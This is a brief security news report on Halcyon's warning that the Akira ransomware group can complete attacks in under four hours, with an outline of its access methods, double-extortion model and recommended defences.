SECURITY researchers warn of a velocity shift in ransomware after Halcyon reported the Akira group can complete an entire attack lifecycle in under four hours, and in some cases less than one hour without detection. Akira typically gains initial access by exploiting vulnerabilities in internet-facing VPN appliances and backup solutions, especially where multi-factor authentication is lacking, with devices from SonicWall, Veeam and Cisco among those previously observed.
The group is also noted to employ credential theft, spearphishing, password spraying, and even initial access brokers, and it follows a classic double-extortion model by exfiltrating data prior to encryption while evading detection through disabling security software and using living-off-the-land techniques such as FileZilla, WinRAR, WinSCP and RClone.
Akira’s rapid compromise capabilities, disciplined operational tempo, and investment in reliable decryption infrastructure are cited as differentiators, contributing to as much as $244m in illicit gains since it appeared in March 2023, according to the US government. Halcyon advises organisations to implement layered defences, harden initial access, limit lateral movement and credential abuse, and deploy anti-ransomware solutions to block malicious binaries pre-execution.